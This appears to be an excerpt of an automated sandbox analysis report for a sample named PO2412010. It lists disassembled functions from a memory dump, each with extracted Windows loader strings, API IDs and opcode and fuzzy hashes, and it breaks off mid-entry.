                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-2986994758
                                                                        • Opcode ID: 7c3f129cd83c65d00b38ec68de51ef830e053a07d61270f172454d56de3cb669
                                                                        • Instruction ID: af20e9b9acc1170bd77cd5e426067168408b96e17838fe8ad570615988b9440b
                                                                        • Opcode Fuzzy Hash: 7c3f129cd83c65d00b38ec68de51ef830e053a07d61270f172454d56de3cb669
                                                                        • Instruction Fuzzy Hash: E7F0F635640308BBE729EA4DCD46F997FACFB80B54F5400A9FB40B72D5D3B0A904CA91
                                                                        Function 01A903E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID: ___swprintf_l
                                                                        • String ID: #%u
                                                                        • API String ID: 48624451-232158463
                                                                        • Opcode ID: 43181d3c362bf1348566d8f9eed07db876b7ce68a61d38d2cf9055fac8630854
                                                                        • Instruction ID: 59b08fe5b4fa4e5611ae1e1a76066b63372d8fcc6fff3f28f8b779cceef6359d
                                                                        • Opcode Fuzzy Hash: 43181d3c362bf1348566d8f9eed07db876b7ce68a61d38d2cf9055fac8630854
                                                                        • Instruction Fuzzy Hash: A2715871A0014A9FDF05DFA8CA94BAEBBF8BF48744F144069E905E7251EB34ED45CBA0
                                                                        Function 01A8A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • LdrResSearchResource Enter, xrefs: 01A8AA13
                                                                        • LdrResSearchResource Exit, xrefs: 01A8AA25
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                        • API String ID: 0-4066393604
                                                                        • Opcode ID: b249ccfeffa76a58361203b6d8a95040776f736915a71e1f3b72bca893d501d4
                                                                        • Instruction ID: 5f123baf12137a9a31ab4f27bbc72a3dcb0ce2a6fcee35a27af0331fead274aa
                                                                        • Opcode Fuzzy Hash: b249ccfeffa76a58361203b6d8a95040776f736915a71e1f3b72bca893d501d4
                                                                        • Instruction Fuzzy Hash: 83E16E71E00219AFEF26EF99C988BAEBBB9BF44310F14442BE901E7251E774D941CB50
                                                                        Function 01B4A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: `$`
                                                                        • API String ID: 0-197956300
                                                                        • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                        • Instruction ID: 8ce53c6c0edb4c9e10e0c1a85af1a719bad6ee2fd4503d22a1ac20d58473cc9f
                                                                        • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                        • Instruction Fuzzy Hash: F6C1EF312443429BEB28CF28C840B6BBBE5EFC4318F088A6DF696CB291D774D505DB81
                                                                        Function 01AFE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: Legacy$UEFI
                                                                        • API String ID: 2994545307-634100481
                                                                        • Opcode ID: 3f5338de1c13941071c7b83241f0fd39f7745c986f9500a18f97885aabee652b
                                                                        • Instruction ID: 9c55be49ce0c9ef8858a1bf44628edb588cb455093dc78a9e89d8bf60b8011b3
                                                                        • Opcode Fuzzy Hash: 3f5338de1c13941071c7b83241f0fd39f7745c986f9500a18f97885aabee652b
                                                                        • Instruction Fuzzy Hash: 72613AB1E002199FDB25DFA9C940BAEBBF9FB48700F15406DE649EB261D731AD40CB50
                                                                        Function 01B243D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$MUI
                                                                        • API String ID: 0-17815947
                                                                        • Opcode ID: db32aed0b8b29fa8d46075ea9292cbe2629b91f4a3679075631d93d86fb8b023
                                                                        • Instruction ID: 1abe85dae82db3f7e7ff4546b160a5ae73a30f8888f8f717fabc2d69c1b539ad
                                                                        • Opcode Fuzzy Hash: db32aed0b8b29fa8d46075ea9292cbe2629b91f4a3679075631d93d86fb8b023
                                                                        • Instruction Fuzzy Hash: F7514A71D0062DAFDF15DFA9CD80AEEBBB8EB08754F10056AE615B7290DB309D09CB60
                                                                        Function 01A804E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 01A8063D
                                                                        • kLsE, xrefs: 01A80540
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                        • API String ID: 0-2547482624
                                                                        • Opcode ID: d9412e1f666d34c5f1513aebd079214ba771945e06409071c13911fcb537f608
                                                                        • Instruction ID: b5a978c9e3b71648b246d3ae2bb044880396d1fe2085ce3d31fc1ca260c018d8
                                                                        • Opcode Fuzzy Hash: d9412e1f666d34c5f1513aebd079214ba771945e06409071c13911fcb537f608
                                                                        • Instruction Fuzzy Hash: 00518E715047429FD728FF79C6406A7BBE4AF84304F14883EFA9A87241E774D549CBA2
                                                                        Function 01A8A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • RtlpResUltimateFallbackInfo Exit, xrefs: 01A8A309
                                                                        • RtlpResUltimateFallbackInfo Enter, xrefs: 01A8A2FB
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                        • API String ID: 0-2876891731
                                                                        • Opcode ID: 622f3fc49d4afef814dde7d01664eb729cb559fcb5cf37c9ee0958f48f4939e6
                                                                        • Instruction ID: 436771dd7a92048089594384b17121486ae6e87b5951ad483e0e71b580bedbff
                                                                        • Opcode Fuzzy Hash: 622f3fc49d4afef814dde7d01664eb729cb559fcb5cf37c9ee0958f48f4939e6
                                                                        • Instruction Fuzzy Hash: B941D334A04649DBDF25EF69C444B6D7BF4FF84700F1840AAE904DB291E375D940CB50
                                                                        Function 01ABA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: Cleanup Group$Threadpool!
                                                                        • API String ID: 2994545307-4008356553
                                                                        • Opcode ID: 957de000bba4c613dded80fefc1f208e914657eaa737ffe3ec96c5d8e9cff8b3
                                                                        • Instruction ID: d15b44f85946f2ce1ca4ec4aacb3ad2a74e7a23ff944568953e49276e95f73fd
                                                                        • Opcode Fuzzy Hash: 957de000bba4c613dded80fefc1f208e914657eaa737ffe3ec96c5d8e9cff8b3
                                                                        • Instruction Fuzzy Hash: F801D1B2644740AFE311DF14CE85B967BF8E794B15F048939B648C7191E734E904CB46
                                                                        Function 01A8C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: MUI
                                                                        • API String ID: 0-1339004836
                                                                        • Opcode ID: 2111daaf57e0a0d461fdb1f1d87c5a58b5239222e9beda372311b1206202276c
                                                                        • Instruction ID: 575cef82cf81f3936ed3a7d675ef6b001cd67180b1e0c589de9efa8eee0e558e
                                                                        • Opcode Fuzzy Hash: 2111daaf57e0a0d461fdb1f1d87c5a58b5239222e9beda372311b1206202276c
                                                                        • Instruction Fuzzy Hash: 5B826B75E002189FEB25EFA9C984BEDBBB1FF48320F148169E919AB295D7309D41CF50
                                                                        Function 01B06420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID: 0-3916222277
                                                                        • Opcode ID: 5ecb2c60b96ec429ee26f54c2cbce351ce547b6a86a7669f10a684543dcd9836
                                                                        • Instruction ID: 2cabf94db7c8fdd7aabf44804a369b2a38704e6e5045614718b8eb45b6d5bb6c
                                                                        • Opcode Fuzzy Hash: 5ecb2c60b96ec429ee26f54c2cbce351ce547b6a86a7669f10a684543dcd9836
                                                                        • Instruction Fuzzy Hash: DB916071A00219AFEF26DB95CD85FEEBBB8EF18B50F504065F600AB190D775AD04CBA4
                                                                        Function 01B2E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID: 0-3916222277
                                                                        • Opcode ID: 1b0f141ca4e400fba0771f531b470b9c90d1204210890769a4a122195b09283d
                                                                        • Instruction ID: 087ad7f0b3734cdd2fb87ceee6e9fb6ae0166f236e1b954751703aafebdc722b
                                                                        • Opcode Fuzzy Hash: 1b0f141ca4e400fba0771f531b470b9c90d1204210890769a4a122195b09283d
                                                                        • Instruction Fuzzy Hash: 1591AE31900659AEDF2AABA6DD84FEFBBB9EF45740F100069F509A7250DB34D909CB90
                                                                        Function 01ABA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: GlobalTags
                                                                        • API String ID: 0-1106856819
                                                                        • Opcode ID: 5f33ac123bb93f7836122119120ec60d97e27d861fe2635b75c8f94ce9f27691
                                                                        • Instruction ID: ffbcb7c3e54e66763f3cfa782e08499e5372c03aa5f0d9a969eb91f3366a102a
                                                                        • Opcode Fuzzy Hash: 5f33ac123bb93f7836122119120ec60d97e27d861fe2635b75c8f94ce9f27691
                                                                        • Instruction Fuzzy Hash: 05716DB5E0021A9FDF29CF9CC5906EDBBB1BF58700F14812EFA0AA7241E7359941CB90
                                                                        Function 01B24978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: .mui
                                                                        • API String ID: 0-1199573805
                                                                        • Opcode ID: 7df906b6bf3dab109c1e53ea1c3b74ff17658712697a0e6aa59a6891715e4261
                                                                        • Instruction ID: b54958ff6a7dd91a9d62a0d5b05c8be6c58e0c6259f0ba4ca35eff6a231052db
                                                                        • Opcode Fuzzy Hash: 7df906b6bf3dab109c1e53ea1c3b74ff17658712697a0e6aa59a6891715e4261
                                                                        • Instruction Fuzzy Hash: 4751A272D0023A9FDF18DF99D944AAEBBB4FF15B10F0541A9EA19BB600D7349C05CBA4
                                                                        Function 01A9E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: EXT-
                                                                        • API String ID: 0-1948896318
                                                                        • Opcode ID: 847ec62cf8161fc64dad39685879e2b38f098e9de3cb6e6c6387d444f8b0a741
                                                                        • Instruction ID: 2180b1eda2c316e5fcc194b252c50a9ba217a581238ad1d7b6908437ebc691ff
                                                                        • Opcode Fuzzy Hash: 847ec62cf8161fc64dad39685879e2b38f098e9de3cb6e6c6387d444f8b0a741
                                                                        • Instruction Fuzzy Hash: 8C419272609342ABDB10DB75C980B6FBBE8AF88714F44092DFA85D7141E774D984C793
                                                                        Function 01AFC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: BinaryHash
                                                                        • API String ID: 0-2202222882
                                                                        • Opcode ID: 52371a1ecae24e8e9be56dfe87d2ce304e8516a19d6e298e5f8fb221a970a9e0
                                                                        • Instruction ID: eb56efd641380055aa896150b00c4b1630f33c3273e2e1097cc4e9435853edf6
                                                                        • Opcode Fuzzy Hash: 52371a1ecae24e8e9be56dfe87d2ce304e8516a19d6e298e5f8fb221a970a9e0
                                                                        • Instruction Fuzzy Hash: 5A4136B1D0052DABDF21DBA1CD84FDEB77CAB54724F0045A9E708AB144DB709E898F94
                                                                        Function 01B16B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: #
                                                                        • API String ID: 0-1885708031
                                                                        • Opcode ID: e910b297bed3c14af5b2dbb321696d50ee1d978da845174ae0d1eda343afeb97
                                                                        • Instruction ID: 72ba60f0f0ce924d1e2d6d173dd8ad02c3352c719cedefdb682871d0c7e6c788
                                                                        • Opcode Fuzzy Hash: e910b297bed3c14af5b2dbb321696d50ee1d978da845174ae0d1eda343afeb97
                                                                        • Instruction Fuzzy Hash: 78312831E007099BEB26CB6DC850BEE7BB8EF15704F9540ACE940AB286DBB5D905CB50
                                                                        Function 01AFCA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: BinaryName
                                                                        • API String ID: 0-215506332
                                                                        • Opcode ID: ac00949d8a4999b0862475fcbccd1f050fbe601b4a1e116cbb9f24e0ec718b38
                                                                        • Instruction ID: 9230905947cf65f4374e4abc9d29e1a41e89cda0374d6912e5ea09e1c8699d9f
                                                                        • Opcode Fuzzy Hash: ac00949d8a4999b0862475fcbccd1f050fbe601b4a1e116cbb9f24e0ec718b38
                                                                        • Instruction Fuzzy Hash: 1531E57A90051DAFEB16DB9AC945E6FBB74EF80720F01412DFA15A7254D7309E04D7E0
                                                                        Function 01B0892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 01B0895E
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                        • API String ID: 0-702105204
                                                                        • Opcode ID: 10b0e9e57a091eee29f37756f394750c75bd22e2879f46a7e57f10e6d5d7f84b
                                                                        • Instruction ID: 1475726416357621b362ded92ced2d11b5c8ae2ac29ab12c3cb6760b266514db
                                                                        • Opcode Fuzzy Hash: 10b0e9e57a091eee29f37756f394750c75bd22e2879f46a7e57f10e6d5d7f84b
                                                                        • Instruction Fuzzy Hash: 1601F232700202AFEA3E7A5A9C84A5A7F65EF85264B0520ECF641175A2CF20AD40C7D2
                                                                        Function 01B22000 Relevance: .8, Instructions: 757COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 232c8c4f1ee48375adfa1bbb5a6a3e253fe553093c0a2e8a251ea1d0cfc657fc
                                                                        • Instruction ID: 22610ff1f988622e36ff6985cab3a802185d71b64c28fcb5fc5dfb774cf81fff
                                                                        • Opcode Fuzzy Hash: 232c8c4f1ee48375adfa1bbb5a6a3e253fe553093c0a2e8a251ea1d0cfc657fc
                                                                        • Instruction Fuzzy Hash: 5042E7316083518FDB29CF68C890A6BBBE5FF88300F4449ADFA99D7250D771D949CB52
                                                                        Function 01B18158 Relevance: .6, Instructions: 617COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: decf0b9d2683989886ab8d887e5d8308945cd5213ff52f3b584fc5d5c352cd0b
                                                                        • Instruction ID: dc668f736b78052d270184ad651338301b7d05b3df64505cefffaef82ece9e65
                                                                        • Opcode Fuzzy Hash: decf0b9d2683989886ab8d887e5d8308945cd5213ff52f3b584fc5d5c352cd0b
                                                                        • Instruction Fuzzy Hash: 35427D75E002198FEB29CF69C881BADBBF5FF48300F598199E949EB246D7349981CF50
                                                                        Function 01A92840 Relevance: .6, Instructions: 605COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 70fcc6822dd0ed4b8c0e2d03cbe6360b8e5cc18d176ab31a19baa32716f8fde3
                                                                        • Instruction ID: c4c2a0c69dfa6b2a80dacaa6aaf162ee26b84c494f8e236d7b459163fd583571
                                                                        • Opcode Fuzzy Hash: 70fcc6822dd0ed4b8c0e2d03cbe6360b8e5cc18d176ab31a19baa32716f8fde3
                                                                        • Instruction Fuzzy Hash: 2A32DF70A007559BEF29CF69C8487BEBBF2BFA4304F24491ED48A9B285D735A841CF50
                                                                        Function 01B2A118 Relevance: .6, Instructions: 591COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 38f49122f5400bbf433b98500d039f5c5d2fd69bf912ceaf7f528dcbafb605e3
                                                                        • Instruction ID: 5901eac831b0b6291514de372254148661fe4204c94533977400d8a8a98a4d69
                                                                        • Opcode Fuzzy Hash: 38f49122f5400bbf433b98500d039f5c5d2fd69bf912ceaf7f528dcbafb605e3
                                                                        • Instruction Fuzzy Hash: 3B22B0702046718BEB2DCF39C094372BBF1EF45300F1889D9E99A8BA96D335D45ADB64
                                                                        Function 01A86A50 Relevance: .5, Instructions: 548COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 516919f503c2dae5c66e9f2e1bd83eef7c26fac129e3d771106700a8643ae6fd
                                                                        • Instruction ID: df4a14226a6150717c4f22a220b21934cf5c313928f7accdd82238a6c4d7a585
                                                                        • Opcode Fuzzy Hash: 516919f503c2dae5c66e9f2e1bd83eef7c26fac129e3d771106700a8643ae6fd
                                                                        • Instruction Fuzzy Hash: 6532C071A00615CFEB25DFA8C584BAEBBF1FF48310F148569E95AAB391D734E841CB50
                                                                        Function 01AA4A35 Relevance: .4, Instructions: 423COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                        • Instruction ID: b95c82680ea083cc4c26bcb44986108227589e0a9896b520063fb0ff68bd9d24
                                                                        • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                        • Instruction Fuzzy Hash: ADF14F71E0021A9BDF15CFA9D594BAEBBF5AF48710F498129E905EB340E774EC41CBA0
                                                                        Function 01B1892B Relevance: .4, Instructions: 386COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e90baea0f4a0749be439b54911759f205a06077e6e2fad85848a4ef170b43116
                                                                        • Instruction ID: 4342b0cd3c84bd178f3aa0359b64846233e14383cc711d517844354fca8f1e78
                                                                        • Opcode Fuzzy Hash: e90baea0f4a0749be439b54911759f205a06077e6e2fad85848a4ef170b43116
                                                                        • Instruction Fuzzy Hash: 9ED1F272A0060A8BDF09CF59C841AFEB7F2FF88304F9A81A9D955E7245D735E9058B60
                                                                        Function 01A865D0 Relevance: .4, Instructions: 383COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8449a1c36694c7058edb59d202a611b1964f2a0187497780672e9bf22b310165
                                                                        • Instruction ID: 24c7c6bd51f73997ca101022da3ec4884672dedafefaf7722ae0748e2adc3d89
                                                                        • Opcode Fuzzy Hash: 8449a1c36694c7058edb59d202a611b1964f2a0187497780672e9bf22b310165
                                                                        • Instruction Fuzzy Hash: 4EE1B171508342CFD715EF28C590A6ABBF0FF88314F05896DE9998B351EB31E905CB92
                                                                        Function 01A78397 Relevance: .4, Instructions: 380COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 22fb55ad865dc3c924a33eac345e1e5b6cc3f082fbdb1e5494d293410290063b
                                                                        • Instruction ID: d48d27048c69a50496687c31be2aecfd011130dcc5c588064ad194328d02eb4e
                                                                        • Opcode Fuzzy Hash: 22fb55ad865dc3c924a33eac345e1e5b6cc3f082fbdb1e5494d293410290063b
                                                                        • Instruction Fuzzy Hash: A5D1F471A00606DBDB14DF69CD84ABEB7B5BF54304F09862DE917DB281E738EA50CB60
                                                                        Function 01B08243 Relevance: .3, Instructions: 322COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                        • Instruction ID: 26443a5895b79fc08c75dafb65bcc74c44f9f7193b118b44878fb98453529b24
                                                                        • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                        • Instruction Fuzzy Hash: E4B15374E006059FDF2ADB59C940AABBFBAFF88304F14449DAA42977D1DB34EA45CB10
                                                                        Function 01A90535 Relevance: .3, Instructions: 300COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
